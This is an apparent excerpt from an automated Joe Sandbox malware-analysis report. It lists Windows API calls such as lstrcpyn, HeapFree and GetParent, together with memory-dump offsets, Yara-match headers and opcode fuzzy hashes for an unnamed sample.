                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 1e98cd105831d16150243bad0d9c1fd4ae9240906090ef51f94fca20d1a3a0b5
                                                                • Instruction ID: 8767b5bd0d349e60f5f66340f510312a137a6ea04e878a6fe03ee699eb95acc8
                                                                • Opcode Fuzzy Hash: 1e98cd105831d16150243bad0d9c1fd4ae9240906090ef51f94fca20d1a3a0b5
                                                                • Instruction Fuzzy Hash: 0EE08634D45208F7C7106E50AD07BBDBF34A706711F108016B9443A1D2D5765A34B79A
                                                                APIs
                                                                • GetParent.USER32(00000000), ref: 0045607D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Parent
                                                                • String ID:
                                                                • API String ID: 975332729-0
                                                                • Opcode ID: 2a1cdb3e204100450292f962ecd6b12c9455aedf8ac120fa4cd4161b75f6c1d2
                                                                • Instruction ID: eab09d2da63cc470e2d7c5da2bd86dbc444607c9cbfa236b36e2e1147a725add
                                                                • Opcode Fuzzy Hash: 2a1cdb3e204100450292f962ecd6b12c9455aedf8ac120fa4cd4161b75f6c1d2
                                                                • Instruction Fuzzy Hash: DAD0C230D05208B7C610AE40E907B2CBA349703B11F80802ABD043B1C2E6324A28A78A
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 004560BD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: VisibleWindow
                                                                • String ID:
                                                                • API String ID: 1208467747-0
                                                                • Opcode ID: aa1ad4e3b3ca423c950da0449317cf466611b5f60e84eabdbcf0f45ab598fb2c
                                                                • Instruction ID: 256a5dd05f6a5fce77e8d515df2f1984ba230f0ae203550bb037fc93dfdd2f99
                                                                • Opcode Fuzzy Hash: aa1ad4e3b3ca423c950da0449317cf466611b5f60e84eabdbcf0f45ab598fb2c
                                                                • Instruction Fuzzy Hash: 30D0C230D05208B3C210AE50A907B2DBE349703711F80816ABC043B1C2D5328E29A69F
                                                                APIs
                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00474D89
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalLeaveSection
                                                                • String ID:
                                                                • API String ID: 3988221542-0
                                                                • Opcode ID: ec799e7d6f59a7575a8ce1524903297f39fc38e8c7389cfc726570fb2a9553f9
                                                                • Instruction ID: 07a8c152ee8b9b6a6d45b179f52d3f33ca3d78b153dd0b689c5a6fce856d6790
                                                                • Opcode Fuzzy Hash: ec799e7d6f59a7575a8ce1524903297f39fc38e8c7389cfc726570fb2a9553f9
                                                                • Instruction Fuzzy Hash: ADE0C270E00308A7CB20EE54DD47B68B734A706711F004066FA082B1C1E2715A248A9E
                                                                APIs
                                                                • GetCurrentProcessId.KERNEL32(?,?,004014FF), ref: 0040C1FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentProcess
                                                                • String ID:
                                                                • API String ID: 2050909247-0
                                                                • Opcode ID: a3efc20a4f26b74a40b2921856050b7f360abaabd627c938a93083109454b905
                                                                • Instruction ID: a6c5faf60ee293af242c299a8563327bbc013f20570462a7b347525dec476b91
                                                                • Opcode Fuzzy Hash: a3efc20a4f26b74a40b2921856050b7f360abaabd627c938a93083109454b905
                                                                • Instruction Fuzzy Hash: 9DD05E31E45308F7C610AFD07A4377CB6389707701F9092EAA9093A1C1D5799A24968F
                                                                Strings
                                                                • ength;for(i=0;i<length;i+=1){partial[i]=str(i,value)||'null'}v=partial.length===0?'[]':gap?'[\n'+gap+partial.join(',\n'+gap)+'\n'+mind+']':'['+partial.join(',')+']';gap=mind;return v}if(rep&&typeof rep==='object'){length=rep.length;for(i=0;i<length;i+=1){k=rep, xrefs: 0043CFDE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ength;for(i=0;i<length;i+=1){partial[i]=str(i,value)||'null'}v=partial.length===0?'[]':gap?'[\n'+gap+partial.join(',\n'+gap)+'\n'+mind+']':'['+partial.join(',')+']';gap=mind;return v}if(rep&&typeof rep==='object'){length=rep.length;for(i=0;i<length;i+=1){k=rep
                                                                • API String ID: 0-2531037153
                                                                • Opcode ID: b0de30a15207844d859e1ceb90459aaf6dc06da6405ad641bf762fe2b64ab593
                                                                • Instruction ID: 6cae724635f7145c45885da40daf68c879d049818040e2fcf152d287ebf81c82
                                                                • Opcode Fuzzy Hash: b0de30a15207844d859e1ceb90459aaf6dc06da6405ad641bf762fe2b64ab593
                                                                • Instruction Fuzzy Hash: 5A9157B56042018FD709CF10C491BA6B7E5FF88700F0492BEE95A8F792EB35E949CB55
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b335855e582eefdf3b03c921aa6409c3a641d80dbaebd6dd11bd3c5d438a65b0
                                                                • Instruction ID: f5d4e02f9df5eb4f230b3ebe8f1113bdb286bd4f819b904bc1285eecc9b3e02d
                                                                • Opcode Fuzzy Hash: b335855e582eefdf3b03c921aa6409c3a641d80dbaebd6dd11bd3c5d438a65b0
                                                                • Instruction Fuzzy Hash: C2612B70D00218EFEF10AFA5CC46BEEBAB5FF04704F10446EE5107A291DBBA4A51DB69
                                                                APIs
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0043C98E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID:
                                                                • API String ID: 97706510-0
                                                                • Opcode ID: 332989b5c435f07f114a04b5b340b311979664fa9df371264e5e416ccea5a32d
                                                                • Instruction ID: 47a58690e0fcb02ea880f7e2753d24f3eda477bf3591826c8d5e417368851795
                                                                • Opcode Fuzzy Hash: 332989b5c435f07f114a04b5b340b311979664fa9df371264e5e416ccea5a32d
                                                                • Instruction Fuzzy Hash: 2C41F8B1B41208AFFB20EE6598C2BAB77A9DB09754F14502BE908F7381D2789E00875D
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0047CBE6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID:
                                                                • API String ID: 2538663250-0
                                                                • Opcode ID: 5474b4ad2ffce09a8999664307e047282dd966176c3043abae31c421fe621b36
                                                                • Instruction ID: 65ec91e8b14186a3305ae80dc9562464187b104dee5f4be0b25a81da4547e9e5
                                                                • Opcode Fuzzy Hash: 5474b4ad2ffce09a8999664307e047282dd966176c3043abae31c421fe621b36
                                                                • Instruction Fuzzy Hash: 253101B0900608AFEB619F55D84A7DD7AF0AB05308F10C46AD50CAE281D7B94658CF5A
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004BCAD9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID:
                                                                • API String ID: 1659193697-0
                                                                • Opcode ID: 8a269aeb3bfc3bc47a1f2722f769c8d267a84884453a9e7c2def18ee8a427707
                                                                • Instruction ID: 61736526da1c90fd09479a754c920841a983b54de14e136c01cbc83fabaed216
                                                                • Opcode Fuzzy Hash: 8a269aeb3bfc3bc47a1f2722f769c8d267a84884453a9e7c2def18ee8a427707
                                                                • Instruction Fuzzy Hash: B521DB70D0420CEBEF00AF95E886BEDBF75FB08714F1080A9E5403A295D7751A74DB69
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Free
                                                                • API String ID: 0-3978063606
                                                                • Opcode ID: 84295015bba23df668d59298cb910224709afb03a39f1800e024b48c5c143c93
                                                                • Instruction ID: 837fbae81b1606cebb644f16e7a655ec171e0761fc66a41d1d4b01894da66afa
                                                                • Opcode Fuzzy Hash: 84295015bba23df668d59298cb910224709afb03a39f1800e024b48c5c143c93
                                                                • Instruction Fuzzy Hash: 3611E7B2505255CBD720CF0AD8806EEF3E5FB68365F298D5FE86987740E3359984C780
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000,00000000,00000020,?,?,?,?,?,?,004B59E0,00000000), ref: 004B6429
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID:
                                                                • API String ID: 1659193697-0
                                                                • Opcode ID: a8ffbbd6650ca10720eb381ecf9a27704d945df97594b2e49e96ad7a0fddb472
                                                                • Instruction ID: 3517c4c70b630eb3c7d79c476c8a3e7fe73188df3eb3a49897989b70a454daba
                                                                • Opcode Fuzzy Hash: a8ffbbd6650ca10720eb381ecf9a27704d945df97594b2e49e96ad7a0fddb472
                                                                • Instruction Fuzzy Hash: 62115170D0460CEBDB00AF91ED46BEDBA34EB49710F61406AE54036195DB7A0E70D76E
                                                                APIs
                                                                • lstrcpyn.KERNEL32(00000001,00000001,00000000,00000000,00000000), ref: 004AE53C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID:
                                                                • API String ID: 97706510-0
                                                                • Opcode ID: aa5f0aaad0bf64ddd8a0702eadeeb35a0b46fc62cad0e7844d9c57300ae78c13
                                                                • Instruction ID: 1cbfb2eb87bac91b13e74b3c3a3056b9d54a6a09be11a9ec1645322ef756946d
                                                                • Opcode Fuzzy Hash: aa5f0aaad0bf64ddd8a0702eadeeb35a0b46fc62cad0e7844d9c57300ae78c13
                                                                • Instruction Fuzzy Hash: 45F0A075E40304B7DB50DE92EC82F6A77789B27751F084016FD04AB381E635ED109AAA
                                                                APIs
                                                                • lstrcpyn.KERNEL32(0045A166,0045A166,00000030,0045A166,00000000,?,?,?,00459752,00000000), ref: 0045A1F3
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID:
                                                                • API String ID: 97706510-0
                                                                • Opcode ID: 872f5e39721782cbd74c42303f2df29a26938c874a440ccd741c261298ad9ef1
                                                                • Instruction ID: 70c486093c2e9d0a7cbd5d1833d4bd34eabfbce023f9ef93658ebaf81027bca1
                                                                • Opcode Fuzzy Hash: 872f5e39721782cbd74c42303f2df29a26938c874a440ccd741c261298ad9ef1
                                                                • Instruction Fuzzy Hash: AFE0D839A44308BBCB009E80D847B6C7B34A70A711F404056FE042F292D1724A34EBDB
                                                                APIs
                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00404981
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcat
                                                                • String ID:
                                                                • API String ID: 4038537762-0
                                                                • Opcode ID: 8b947158b192fe5854b1fa1d4c040b9a9fb9b6c72f7c72dd15978268b6003991
                                                                • Instruction ID: c41c8baeb4ea876361e11e557d917890fabf5e8e00671f7474ff7f71d5c67e80
                                                                • Opcode Fuzzy Hash: 8b947158b192fe5854b1fa1d4c040b9a9fb9b6c72f7c72dd15978268b6003991
                                                                • Instruction Fuzzy Hash: 2FE092B5D00308ABC7009F94D843BAEB774974A300F0041B2A6047B281D5355A209BDA
                                                                APIs
                                                                • lstrcpyn.KERNEL32(004423D0,004423D0,00000000,004423D0,00000000), ref: 00442481
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID:
                                                                • API String ID: 97706510-0
                                                                • Opcode ID: 7830b7b3ebbac3acbb06befd74d52960ebbfd2fe8c87051490250ad848741e2e
                                                                • Instruction ID: 796a54245656a27babe9845ed4a2a9c322952dc4e039c3cedec698f99c547848
                                                                • Opcode Fuzzy Hash: 7830b7b3ebbac3acbb06befd74d52960ebbfd2fe8c87051490250ad848741e2e
                                                                • Instruction Fuzzy Hash: 6FE04835A44308BBDB109E40D986F6D7B34EB0A711F408055FA042F196D5725964EB9A
                                                                APIs
                                                                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 004B4CF9
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: be10bfee1e8267c3de1a2ab46995ff55cbdf872b5fe851270893657475d5634d
                                                                • Instruction ID: 2183c9ccd652546eb472068468181bd5908e1d4fccadc1821f0bb7e659a98c20
